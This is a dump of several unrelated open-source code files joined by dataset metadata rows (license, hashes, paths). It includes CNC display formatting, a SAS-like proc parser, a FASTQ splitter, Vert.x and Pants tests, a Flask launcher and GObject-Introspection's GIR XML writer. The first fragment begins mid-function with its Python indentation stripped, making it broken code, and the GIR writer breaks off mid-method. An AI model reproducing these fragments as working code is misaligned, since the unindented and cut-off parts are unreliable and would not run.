offsetformat = "% 5s %1s:% 9.3f G92 %1s:% 9.3f"
rotformat = "% 5s %1s:% 9.3f"
else:
format = "% 6s:% 9.4f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.4f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.4f G92 %1s:% 9.4f"
rotformat = "% 5s %1s:% 9.4f"
diaformat = " " + format
posstrs = []
droposstrs = []
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
posstrs.append(format % (a, positions[i]))
if self.show_dtg:
droposstrs.append(droformat % (a, positions[i], a, axisdtg[i]))
else:
droposstrs.append(droformat % (a, positions[i]))
droposstrs.append("")
for i in range(9):
index = s.g5x_index
if index<7:
label = "G5%d" % (index+3)
else:
label = "G59.%d" % (index-6)
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(offsetformat % (label, a, g5x_offset[i], a, g92_offset[i]))
droposstrs.append(rotformat % (label, 'R', s.rotation_xy))
droposstrs.append("")
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(rotformat % ("TLO", a, tlo_offset[i]))
        # if it's a lathe, only show radius or diameter as per the property;
        # we have to adjust the homing icon to line up:
if self.is_lathe():
if homed[0]:
homed.pop(0)
homed.pop(0)
homed.insert(0,1)
homed.insert(0,0)
posstrs[0] = ""
if self.show_lathe_radius:
posstrs.insert(1, format % ("Rad", positions[0]))
else:
posstrs.insert(1, format % ("Dia", positions[0]*2.0))
droposstrs[0] = ""
if self.show_dtg:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0], "R", axisdtg[0]))
else:
droposstrs.insert(1, droformat % ("Dia", positions[0]*2.0, "D", axisdtg[0]*2.0))
else:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0]))
else:
droposstrs.insert(1, diaformat % ("Dia", positions[0]*2.0))
if self.show_velocity:
posstrs.append(format % ("Vel", spd))
pos=0
for i in range(9):
if s.axis_mask & (1<<i): pos +=1
            if self.is_lathe():
                pos += 1
droposstrs.insert(pos, " " + format % ("Vel", spd))
if self.show_dtg:
posstrs.append(format % ("DTG", dtg))
return limit, homed, posstrs, droposstrs
def realize(self, widget):
gremlin.Gremlin.realize(self, widget)
@rs274.glcanon.with_context
def _load(self, filename):
return self.load(filename)
# TODO fix this so it doesn't print twice and it should probably pop up a dialog
def report_gcode_error(self, result, seq, filename):
error_str = gcode.strerror(result)
print("G-Code error in " + os.path.basename(filename) + "\n" + "Near line "
+ str(seq) + " of\n" + filename + "\n" + error_str + "\n")
| lgpl-2.1 | 7,631,646,314,919,300,000 | 43.533937 | 121 | 0.536883 | false |
chappers/Stan | stan/proc/proc_parse.py | 1 | 1781 | """
The :mod:`stan.proc.proc_parse` module is the proc parser for SAS-like language.
"""
import re
import pkgutil
from stan.proc.proc_expr import RESERVED_KEYWORDS, PROC_
import stan.proc_functions as proc_func
from stan.proc.proc_sql import proc_sql
def proc_parse(cstr):
"""proc parse converts procedure statements to python function equivalents
Parameters
----------
v_ls : list of tokens
Notes
-----
``data`` and ``output``/``out`` are protected variables.
If you wish to use a DataFrame as an argument, prepend ``dt_`` for the parser to interpret this correctly
"""
# if cstr is in the form "proc sql" we won't pass tokens
if re.match(r"^\s*proc\s*sql", cstr.strip(), re.IGNORECASE):
return proc_sql(cstr.strip())
v_ls = PROC_.parseString(cstr)
sls = []
preprend = ''
for ls in v_ls[1:]:
if len(ls[1:]) > 1:
sls.append("%s=['%s']" % (ls[0], "','".join(ls[1:])))
else:
if ls[0].startswith('dt_') or ls[0] in ['data']: # hungarian notation if we want to use DataFrame as a variable
sls.append("%s=%s" % (ls[0], ls[1]))
elif ls[0] in ['output', 'out']:
preprend += '%s=' % ls[1]
else:
sls.append("%s='%s'" % (ls[0], ls[1]))
# try to find v_ls[0] in the `proc_func` namespace...
f_name = v_ls[0].strip().lower()
if f_name in [name for _, name, _ in pkgutil.iter_modules(proc_func.__path__)]: # is there a better way?
func_name = "%s.%s" % (f_name, f_name)
else:
func_name = f_name
return '%s%s(%s)' % (preprend, func_name, ','.join(sls)) # this statement is a bit dodgy
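# Illustrative sketch (added; the exact token grouping depends on the PROC_ grammar):
# a statement along the lines of
#
#   proc means data=dt_df out=result; var x y;
#
# is intended to come out as a call string such as
#
#   "result=means.means(data=dt_df,var=['x','y'])"
#
# assuming a ``means`` module exists in stan.proc_functions (otherwise the bare
# name ``means`` is used as the function).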
| mit | -3,020,345,216,742,110,000 | 29.706897 | 123 | 0.540707 | false |
DistributedML/TorML | ML/data/amazon/parse_amazon.py | 1 | 1657 | import numpy as np
import pandas as pd
import arff
import pdb
def main():
data = np.load('amazon.npy')
# Shuffle the data
sfflidx = np.random.permutation(data.shape[0])
data = data[sfflidx]
testidx = int(data.shape[0] * 0.7)
testdata = data[testidx:, ]
traindata = data[0:testidx, ]
# standardize each column
traindata[:, 0:10000], _, _ = standardize_cols(traindata[:, 0:10000])
testdata[:, 0:10000], _, _ = standardize_cols(testdata[:, 0:10000])
for i in range(int(np.max(data[:, 10000]) + 1)):
idx = np.where(traindata[:, 10000] == i)[0]
print("Label " + str(i) + " has " + str(len(idx)))
labeldata = traindata[idx]
np.save("amazon" + str(i), labeldata)
np.save("amazon_train", traindata)
np.save("amazon_test", testdata)
# # Make a bad dataset, push class 0 to 11 (normal)
# baddata = traindata[np.where(traindata[:, 41] == 0)[0]]
# baddata[:, -1] = 11
# np.save("kddcup_bad", baddata)
def load_raw():
datadump = arff.load(open('amazon.arff', 'rb'))
data = np.array(datadump['data'])
# Convert labels to categorical
data[:, -1] = np.argmax(pd.get_dummies(data[:, -1]).values, axis=1)
data = data.astype(float)
pdb.set_trace()
np.save("amazon", data)
def standardize_cols(X, mu=None, sigma=None):
# Standardize each column with mean 0 and variance 1
n_rows, n_cols = X.shape
if mu is None:
mu = np.mean(X, axis=0)
if sigma is None:
sigma = np.std(X, axis=0)
sigma[sigma < 1e-8] = 1.
return (X - mu) / sigma, mu, sigma
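# Illustrative usage sketch (added; not part of the original script): the optional
# mu/sigma arguments let the training-set statistics be reused on held-out data.
def _example_standardize(train_X, test_X):
    train_std, mu, sigma = standardize_cols(train_X)
    test_std, _, _ = standardize_cols(test_X, mu=mu, sigma=sigma)
    return train_std, test_std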
if __name__ == "__main__":
main()
| mit | 6,870,042,225,450,228,000 | 22.338028 | 73 | 0.581774 | false |
SteffenGuertler/vertx-mod-asyncmongodb | src/test/resources/integration_tests/python/basic_integration_test.py | 1 | 1751 | # Simple integration test which shows tests deploying other verticles, using the Vert.x API etc
from org.vertx.testtools import VertxAssert
import vertx_tests
from core.event_bus import EventBus
import vertx
# The test methods must begin with "test"
def test_http():
# Create an HTTP server which just sends back OK response immediately
def req_handler(req):
req.response.end()
def resp_handler(resp):
VertxAssert.assertTrue(200 == resp.status_code)
# If we get here, the test is complete
# You must always call `testComplete()` at the end. Remember that testing is *asynchronous* so
# we cannot assume the test is complete by the time the test method has finished executing like
# in standard synchronous tests
VertxAssert.testComplete()
def listen_handler(err, server):
VertxAssert.assertNull(err)
# The server is listening so send an HTTP request
vertx.create_http_client().set_port(8181).get_now("/", resp_handler)
vertx.create_http_server().request_handler(req_handler).listen(8181, "0.0.0.0", listen_handler)
# This test deploys some arbitrary verticle - note that the call to testComplete() is inside the Verticle `SomeVerticle`
def test_deploy_arbitrary_verticle():
vertx.deploy_verticle('de.steffeng.trials.vertx.urlrewritingproxy.integration.java.SomeVerticle')
# This demonstrates how tests are asynchronous - the timer does not fire until 1 second later -
# which is almost certainly after the test method has completed.
def test_complete_on_timer():
def handler(timer_id):
VertxAssert.assertNotNull(timer_id)
VertxAssert.testComplete()
vertx.set_timer(1000, handler)
vertx_tests.start_tests(locals())
| mit | -6,766,657,994,172,449,000 | 40.690476 | 120 | 0.727013 | false |
tdyas/pants | tests/python/pants_test/backend/jvm/tasks/jvm_compile/rsc/test_rsc_compile_integration.py | 1 | 2189 | # Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants_test.backend.jvm.tasks.jvm_compile.rsc.rsc_compile_integration_base import (
RscCompileIntegrationBase,
ensure_compile_rsc_execution_strategy,
)
class RscCompileIntegration(RscCompileIntegrationBase):
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/7856")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_basic_binary(self):
self._testproject_compile("mutual", "bin", "A")
@ensure_compile_rsc_execution_strategy(
RscCompileIntegrationBase.rsc_and_zinc,
PANTS_COMPILE_RSC_SCALA_WORKFLOW_OVERRIDE="zinc-only",
)
def test_workflow_override(self):
self._testproject_compile("mutual", "bin", "A", outline_result=False)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_executing_multi_target_binary(self):
pants_run = self.do_command("run", "examples/src/scala/org/pantsbuild/example/hello/exe")
self.assertIn("Hello, Resource World!", pants_run.stdout_data)
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8679")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_with_transitive_exported_scala_dep(self):
self.do_command(
"compile",
"testprojects/src/scala/org/pantsbuild/testproject/javadepsonscalatransitive:java-in-different-package",
)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_sources(self):
self.do_command("compile", "testprojects/src/scala/org/pantsbuild/testproject/javasources")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_node_dependencies(self):
self.do_command(
"compile", "contrib/node/examples/src/java/org/pantsbuild/testproject/jsresources"
)
def test_rsc_hermetic_jvm_options(self):
self._test_hermetic_jvm_options(self.rsc_and_zinc)
| apache-2.0 | -6,702,051,356,664,883,000 | 43.673469 | 116 | 0.727273 | false |
Magda-M/general-tools | fq.split.py | 1 | 2084 | """
SOURCE: https://gist.github.com/brentp/6625544
split a single fastq file into random, non-overlapping subsets
arguments:
 + fastq file
 + number of splits
 + number of reps
 + paired flag (0 = single-end reads, 1 = paired-end/interleaved records)
e.g.:
python fq.split.py input.fastq 3 4 0
will create 12 new files in 4 sets of 3. Each
set of 3 will contain all of the original records.
"""
import gzip
import random
from itertools import islice, izip
xopen = lambda fq: gzip.open(fq) if fq.endswith('.gz') else open(fq)
def fqiter(fq, lines_per_read):
with xopen(fq) as fh:
fqclean = (x.strip("\r\n") for x in fh if x.strip())
while True:
rec = [x for x in islice(fqclean, lines_per_read)]
if not rec: raise StopIteration
assert all(rec) and len(rec) == lines_per_read
yield rec
def fqsplit(fq, nchunks, nreps, paired, prefix=None):
if paired:
lines_per_read = 8
else:
lines_per_read = 4
if prefix == None: prefix = fq + ".split"
prefix += "chunk-%i.rep-%i.fq"
fq_size = sum(1 for x in xopen(fq) if len(x.strip("\r\n"))>0)
assert fq_size % lines_per_read == 0
fq_size /= lines_per_read # number of records
print >>sys.stderr, "num reads/read pairs:", fq_size
print >>sys.stderr, "num chunks to split into:", nchunks
if fq_size % nchunks == 0 :
chunk_size = fq_size // nchunks
else:
chunk_size = 1 + (fq_size) // nchunks
print >>sys.stderr, "chunk_size:", chunk_size
for rep in range(1, nreps + 1):
files = [open(prefix % (c, rep), 'w') for c in range(1, nchunks + 1)]
ints = range(fq_size)
random.shuffle(ints)
for i, fqr in izip(ints, fqiter(fq, lines_per_read)):
chunk, chunk_i = divmod(i, chunk_size)
print >>files[chunk], "\n".join(fqr)
[f.close() for f in files]
if __name__ == "__main__":
import sys
fq = sys.argv[1]
nchunks = int(sys.argv[2])
nreps = int(sys.argv[3])
paired = bool(int(sys.argv[4]))
    print paired  # 0 = single, 1 = paired end reads
fqsplit(fq, nchunks, nreps, paired) | gpl-3.0 | 607,869,430,377,086,200 | 27.561644 | 77 | 0.597409 | false |
goniz/buildscript | build_system/source.py | 1 | 2177 | #!/usr/bin/python2
from build_exceptions import BuildError
import os
import re
class File(object):
def __init__(self, path):
self.path = path
def is_newer(self, other):
if os.path.exists(other) is False:
return True
if os.path.exists(self.path) is False:
            raise BuildError('SourceFile.path does not exist: %s' % self.path)
obj = os.stat(other).st_ctime
me = os.stat(self.path).st_ctime
if me > obj:
return True
return False
@property
def extension(self):
regex = '\.(\w+)$'
return re.findall(regex, self.path)[0]
@property
def filename(self):
return os.path.basename(self.path)
def __str__(self):
return self.filename
def __repr__(self):
return str(self)
class Directory(object):
def __init__(self, path, exts=None):
self.path = path
        if exts is None:
            self.extensions = []
        elif isinstance(exts, str):
            self.extensions = [exts]
        elif isinstance(exts, list):
            self.extensions = exts
        else:
            raise TypeError('exts should be a list of strings! got %s' % (exts, ))
def add_extension(self, ext):
if not ext in self.extensions:
self.extensions.append(ext)
def generate_regex(self):
return '\.(%s)$' % ('|'.join(self.extensions), )
def discover(self, output=File):
regex = self.generate_regex()
files = os.listdir(self.path)
files = map(lambda x: os.path.join(self.path, x), files)
files = filter(lambda x: re.findall(regex, x), files)
return map(output, files)
class SourceFile(File):
@property
def objectfile(self):
return self.filename.replace(self.extension, 'o')
@property
def language(self):
ext = self.extension
if 'c' == ext:
return 'c'
elif 'py' == ext:
return 'python'
elif 'cpp' == ext:
return 'cpp'
else:
return 'Unknown'
class SourceDirectory(Directory):
def discover(self, output=SourceFile):
return super(self.__class__, self).discover(output) | mit | -8,906,877,451,912,974,000 | 24.623529 | 82 | 0.569132 | false |
dkkline/CanSat14-15 | presenter/__init__.py | 1 | 1230 | """
Contains a Flask-based webserver in charge of presenting a website and
collected data to users connected via a webbrowser.
"""
__version__ = (0, 0, 1)
from .app import app
from .config import DevelopmentConfig, ProductionConfig
from flask_debugtoolbar import DebugToolbarExtension
def run_dev():
"""
Runs the presenter module in developer mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
app.config.from_object(DevelopmentConfig)
toolbar = DebugToolbarExtension(app)
app.run(use_reloader=False, host=DevelopmentConfig.HOST,
port=DevelopmentConfig.PORT)
def run_prod():
"""
Runs the presenter module in production mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from presenter import app
app.config.from_object(ProductionConfig)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(ProductionConfig.PORT)
IOLoop.instance().start()
if __name__ == '__main__':
    run_dev()
| mit | -3,177,141,107,318,055,400 | 22.653846 | 70 | 0.701626 | false |
alexef/gobject-introspection | giscanner/girwriter.py | 1 | 23830 | # -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2008 Johan Dahlin
# Copyright (C) 2008, 2009 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
from __future__ import with_statement
from . import ast
from .xmlwriter import XMLWriter
# Bump this for *incompatible* changes to the .gir.
# Compatible changes we just make inline
COMPATIBLE_GIR_VERSION = '1.2'
class GIRWriter(XMLWriter):
def __init__(self, namespace, shlibs, includes, pkgs, c_includes):
super(GIRWriter, self).__init__()
self.write_comment(
'''This file was automatically generated from C sources - DO NOT EDIT!
To affect the contents of this file, edit the original C definitions,
and/or use gtk-doc annotations. ''')
self._write_repository(namespace, shlibs, includes, pkgs,
c_includes)
def _write_repository(self, namespace, shlibs, includes=None,
packages=None, c_includes=None):
if includes is None:
includes = frozenset()
if packages is None:
packages = frozenset()
if c_includes is None:
c_includes = frozenset()
attrs = [
('version', COMPATIBLE_GIR_VERSION),
('xmlns', 'http://www.gtk.org/introspection/core/1.0'),
('xmlns:c', 'http://www.gtk.org/introspection/c/1.0'),
('xmlns:glib', 'http://www.gtk.org/introspection/glib/1.0'),
]
with self.tagcontext('repository', attrs):
for include in sorted(includes):
self._write_include(include)
for pkg in sorted(set(packages)):
self._write_pkgconfig_pkg(pkg)
for c_include in sorted(set(c_includes)):
self._write_c_include(c_include)
self._namespace = namespace
self._write_namespace(namespace, shlibs)
self._namespace = None
def _write_include(self, include):
attrs = [('name', include.name), ('version', include.version)]
self.write_tag('include', attrs)
def _write_pkgconfig_pkg(self, package):
attrs = [('name', package)]
self.write_tag('package', attrs)
def _write_c_include(self, c_include):
attrs = [('name', c_include)]
self.write_tag('c:include', attrs)
def _write_namespace(self, namespace, shlibs):
attrs = [('name', namespace.name),
('version', namespace.version),
('shared-library', ','.join(shlibs)),
('c:identifier-prefixes', ','.join(namespace.identifier_prefixes)),
('c:symbol-prefixes', ','.join(namespace.symbol_prefixes))]
with self.tagcontext('namespace', attrs):
# We define a custom sorting function here because
# we want aliases to be first. They're a bit
# special because the typelib compiler expands them.
def nscmp(a, b):
if isinstance(a, ast.Alias):
if isinstance(b, ast.Alias):
return cmp(a.name, b.name)
else:
return -1
elif isinstance(b, ast.Alias):
return 1
else:
return cmp(a, b)
for node in sorted(namespace.itervalues(), cmp=nscmp):
self._write_node(node)
def _write_node(self, node):
if isinstance(node, ast.Function):
self._write_function(node)
elif isinstance(node, ast.Enum):
self._write_enum(node)
elif isinstance(node, ast.Bitfield):
self._write_bitfield(node)
elif isinstance(node, (ast.Class, ast.Interface)):
self._write_class(node)
elif isinstance(node, ast.Callback):
self._write_callback(node)
elif isinstance(node, ast.Record):
self._write_record(node)
elif isinstance(node, ast.Union):
self._write_union(node)
elif isinstance(node, ast.Boxed):
self._write_boxed(node)
elif isinstance(node, ast.Member):
# FIXME: atk_misc_instance singleton
pass
elif isinstance(node, ast.Alias):
self._write_alias(node)
elif isinstance(node, ast.Constant):
self._write_constant(node)
else:
print 'WRITER: Unhandled node', node
def _append_version(self, node, attrs):
if node.version:
attrs.append(('version', node.version))
def _write_generic(self, node):
for key, value in node.attributes:
self.write_tag('attribute', [('name', key), ('value', value)])
if hasattr(node, 'doc') and node.doc:
self.write_tag('doc', [('xml:whitespace', 'preserve')],
node.doc.strip())
def _append_node_generic(self, node, attrs):
if node.skip or not node.introspectable:
attrs.append(('introspectable', '0'))
if node.deprecated:
attrs.append(('deprecated', node.deprecated))
if node.deprecated_version:
attrs.append(('deprecated-version',
node.deprecated_version))
def _append_throws(self, func, attrs):
if func.throws:
attrs.append(('throws', '1'))
def _write_alias(self, alias):
attrs = [('name', alias.name)]
if alias.ctype is not None:
attrs.append(('c:type', alias.ctype))
self._append_node_generic(alias, attrs)
with self.tagcontext('alias', attrs):
self._write_generic(alias)
self._write_type_ref(alias.target)
def _write_callable(self, callable, tag_name, extra_attrs):
attrs = [('name', callable.name)]
attrs.extend(extra_attrs)
self._append_version(callable, attrs)
self._append_node_generic(callable, attrs)
self._append_throws(callable, attrs)
with self.tagcontext(tag_name, attrs):
self._write_generic(callable)
self._write_return_type(callable.retval, parent=callable)
self._write_parameters(callable, callable.parameters)
def _write_function(self, func, tag_name='function'):
attrs = []
if hasattr(func, 'symbol'):
attrs.append(('c:identifier', func.symbol))
if func.shadowed_by:
attrs.append(('shadowed-by', func.shadowed_by))
elif func.shadows:
attrs.append(('shadows', func.shadows))
self._write_callable(func, tag_name, attrs)
def _write_method(self, method):
self._write_function(method, tag_name='method')
def _write_static_method(self, method):
self._write_function(method, tag_name='function')
def _write_constructor(self, method):
self._write_function(method, tag_name='constructor')
def _write_return_type(self, return_, parent=None):
if not return_:
return
attrs = []
if return_.transfer:
attrs.append(('transfer-ownership', return_.transfer))
if return_.skip:
attrs.append(('skip', '1'))
with self.tagcontext('return-value', attrs):
self._write_generic(return_)
self._write_type(return_.type, function=parent)
def _write_parameters(self, parent, parameters):
if not parameters:
return
with self.tagcontext('parameters'):
for parameter in parameters:
self._write_parameter(parent, parameter)
def _write_parameter(self, parent, parameter):
attrs = []
if parameter.argname is not None:
attrs.append(('name', parameter.argname))
if (parameter.direction is not None) and (parameter.direction != 'in'):
attrs.append(('direction', parameter.direction))
attrs.append(('caller-allocates',
'1' if parameter.caller_allocates else '0'))
if parameter.transfer:
attrs.append(('transfer-ownership',
parameter.transfer))
if parameter.allow_none:
attrs.append(('allow-none', '1'))
if parameter.scope:
attrs.append(('scope', parameter.scope))
if parameter.closure_name is not None:
idx = parent.get_parameter_index(parameter.closure_name)
attrs.append(('closure', '%d' % (idx, )))
if parameter.destroy_name is not None:
idx = parent.get_parameter_index(parameter.destroy_name)
attrs.append(('destroy', '%d' % (idx, )))
if parameter.skip:
attrs.append(('skip', '1'))
with self.tagcontext('parameter', attrs):
self._write_generic(parameter)
self._write_type(parameter.type, function=parent)
def _type_to_name(self, typeval):
if not typeval.resolved:
raise AssertionError("Caught unresolved type %r (ctype=%r)" % (typeval, typeval.ctype))
assert typeval.target_giname is not None
prefix = self._namespace.name + '.'
if typeval.target_giname.startswith(prefix):
return typeval.target_giname[len(prefix):]
return typeval.target_giname
def _write_type_ref(self, ntype):
""" Like _write_type, but only writes the type name rather than the full details """
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
else:
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
attrs.insert(0, ('name', ntype.target_fundamental))
self.write_tag('type', attrs)
def _write_type(self, ntype, relation=None, function=None):
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Varargs):
with self.tagcontext('varargs', []):
pass
elif isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
# we insert an explicit 'zero-terminated' attribute
# when it is false, or when it would not be implied
# by the absence of length and fixed-size
if not ntype.zeroterminated:
attrs.insert(0, ('zero-terminated', '0'))
elif (ntype.zeroterminated
and (ntype.size is not None or ntype.length_param_name is not None)):
attrs.insert(0, ('zero-terminated', '1'))
if ntype.size is not None:
attrs.append(('fixed-size', '%d' % (ntype.size, )))
if ntype.length_param_name is not None:
assert function
attrs.insert(0, ('length', '%d'
% (function.get_parameter_index(ntype.length_param_name, ))))
with self.tagcontext('array', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
with self.tagcontext('type', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
with self.tagcontext('type', attrs):
self._write_type(ntype.key_type)
self._write_type(ntype.value_type)
else:
# REWRITEFIXME - enable this for 1.2
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
# attrs = [('fundamental', ntype.target_fundamental)]
attrs.insert(0, ('name', ntype.target_fundamental))
elif ntype.target_foreign:
attrs.insert(0, ('foreign', '1'))
self.write_tag('type', attrs)
def _append_registered(self, node, attrs):
assert isinstance(node, ast.Registered)
if node.get_type:
attrs.extend([('glib:type-name', node.gtype_name),
('glib:get-type', node.get_type)])
def _write_enum(self, enum):
attrs = [('name', enum.name)]
self._append_version(enum, attrs)
self._append_node_generic(enum, attrs)
self._append_registered(enum, attrs)
attrs.append(('c:type', enum.ctype))
if enum.error_quark:
attrs.append(('glib:error-quark', enum.error_quark))
with self.tagcontext('enumeration', attrs):
self._write_generic(enum)
for member in enum.members:
self._write_member(member)
def _write_bitfield(self, bitfield):
attrs = [('name', bitfield.name)]
self._append_version(bitfield, attrs)
self._append_node_generic(bitfield, attrs)
self._append_registered(bitfield, attrs)
attrs.append(('c:type', bitfield.ctype))
with self.tagcontext('bitfield', attrs):
self._write_generic(bitfield)
for member in bitfield.members:
self._write_member(member)
def _write_member(self, member):
attrs = [('name', member.name),
('value', str(member.value)),
('c:identifier', member.symbol)]
if member.nick is not None:
attrs.append(('glib:nick', member.nick))
self.write_tag('member', attrs)
def _write_constant(self, constant):
attrs = [('name', constant.name), ('value', constant.value)]
with self.tagcontext('constant', attrs):
self._write_type(constant.value_type)
def _write_class(self, node):
attrs = [('name', node.name),
('c:symbol-prefix', node.c_symbol_prefix),
('c:type', node.ctype)]
self._append_version(node, attrs)
self._append_node_generic(node, attrs)
if isinstance(node, ast.Class):
tag_name = 'class'
if node.parent is not None:
attrs.append(('parent',
self._type_to_name(node.parent)))
if node.is_abstract:
attrs.append(('abstract', '1'))
else:
assert isinstance(node, ast.Interface)
tag_name = 'interface'
attrs.append(('glib:type-name', node.gtype_name))
if node.get_type is not None:
attrs.append(('glib:get-type', node.get_type))
if node.glib_type_struct is not None:
attrs.append(('glib:type-struct',
self._type_to_name(node.glib_type_struct)))
if isinstance(node, ast.Class):
if node.fundamental:
attrs.append(('glib:fundamental', '1'))
if node.ref_func:
attrs.append(('glib:ref-func', node.ref_func))
if node.unref_func:
attrs.append(('glib:unref-func', node.unref_func))
if node.set_value_func:
attrs.append(('glib:set-value-func', node.set_value_func))
if node.get_value_func:
attrs.append(('glib:get-value-func', node.get_value_func))
with self.tagcontext(tag_name, attrs):
self._write_generic(node)
if isinstance(node, ast.Class):
for iface in sorted(node.interfaces):
self.write_tag('implements',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Interface):
for iface in sorted(node.prerequisites):
self.write_tag('prerequisite',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Class):
for method in sorted(node.constructors):
self._write_constructor(method)
if isinstance(node, (ast.Class, ast.Interface)):
for method in sorted(node.static_methods):
self._write_static_method(method)
for vfunc in sorted(node.virtual_methods):
self._write_vfunc(vfunc)
for method in sorted(node.methods):
self._write_method(method)
for prop in sorted(node.properties):
self._write_property(prop)
for field in node.fields:
self._write_field(field)
for signal in sorted(node.signals):
self._write_signal(signal)
def _write_boxed(self, boxed):
attrs = [('glib:name', boxed.name)]
if boxed.c_symbol_prefix is not None:
attrs.append(('c:symbol-prefix', boxed.c_symbol_prefix))
self._append_registered(boxed, attrs)
with self.tagcontext('glib:boxed', attrs):
self._write_generic(boxed)
for method in sorted(boxed.constructors):
self._write_constructor(method)
for method in sorted(boxed.methods):
self._write_method(method)
for method in sorted(boxed.static_methods):
self._write_static_method(method)
def _write_property(self, prop):
attrs = [('name', prop.name)]
self._append_version(prop, attrs)
self._append_node_generic(prop, attrs)
# Properties are assumed to be readable (see also generate.c)
if not prop.readable:
attrs.append(('readable', '0'))
if prop.writable:
attrs.append(('writable', '1'))
if prop.construct:
attrs.append(('construct', '1'))
if prop.construct_only:
attrs.append(('construct-only', '1'))
if prop.transfer:
attrs.append(('transfer-ownership', prop.transfer))
with self.tagcontext('property', attrs):
self._write_generic(prop)
self._write_type(prop.type)
def _write_vfunc(self, vf):
attrs = []
if vf.invoker:
attrs.append(('invoker', vf.invoker))
self._write_callable(vf, 'virtual-method', attrs)
def _write_callback(self, callback):
attrs = []
if callback.namespace:
attrs.append(('c:type', callback.ctype or callback.c_name))
self._write_callable(callback, 'callback', attrs)
def _write_record(self, record, extra_attrs=[]):
is_gtype_struct = False
attrs = list(extra_attrs)
if record.name is not None:
attrs.append(('name', record.name))
if record.ctype is not None: # the record might be anonymous
attrs.append(('c:type', record.ctype))
if record.disguised:
attrs.append(('disguised', '1'))
if record.foreign:
attrs.append(('foreign', '1'))
if record.is_gtype_struct_for is not None:
is_gtype_struct = True
attrs.append(('glib:is-gtype-struct-for',
self._type_to_name(record.is_gtype_struct_for)))
self._append_version(record, attrs)
self._append_node_generic(record, attrs)
self._append_registered(record, attrs)
if record.c_symbol_prefix:
attrs.append(('c:symbol-prefix', record.c_symbol_prefix))
with self.tagcontext('record', attrs):
self._write_generic(record)
if record.fields:
for field in record.fields:
self._write_field(field, is_gtype_struct)
for method in sorted(record.constructors):
self._write_constructor(method)
for method in sorted(record.methods):
self._write_method(method)
for method in sorted(record.static_methods):
self._write_static_method(method)
def _write_union(self, union):
attrs = []
if union.name is not None:
attrs.append(('name', union.name))
if union.ctype is not None: # the union might be anonymous
attrs.append(('c:type', union.ctype))
self._append_version(union, attrs)
self._append_node_generic(union, attrs)
self._append_registered(union, attrs)
if union.c_symbol_prefix:
attrs.append(('c:symbol-prefix', union.c_symbol_prefix))
with self.tagcontext('union', attrs):
self._write_generic(union)
if union.fields:
for field in union.fields:
self._write_field(field)
for method in sorted(union.constructors):
self._write_constructor(method)
for method in sorted(union.methods):
self._write_method(method)
for method in sorted(union.static_methods):
self._write_static_method(method)
def _write_field(self, field, is_gtype_struct=False):
if field.anonymous_node:
if isinstance(field.anonymous_node, ast.Callback):
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
with self.tagcontext('field', attrs):
self._write_callback(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Record):
self._write_record(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Union):
self._write_union(field.anonymous_node)
else:
raise AssertionError("Unknown field anonymous: %r" \
% (field.anonymous_node, ))
else:
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
# Fields are assumed to be read-only
# (see also girparser.c and generate.c)
if not field.readable:
attrs.append(('readable', '0'))
if field.writable:
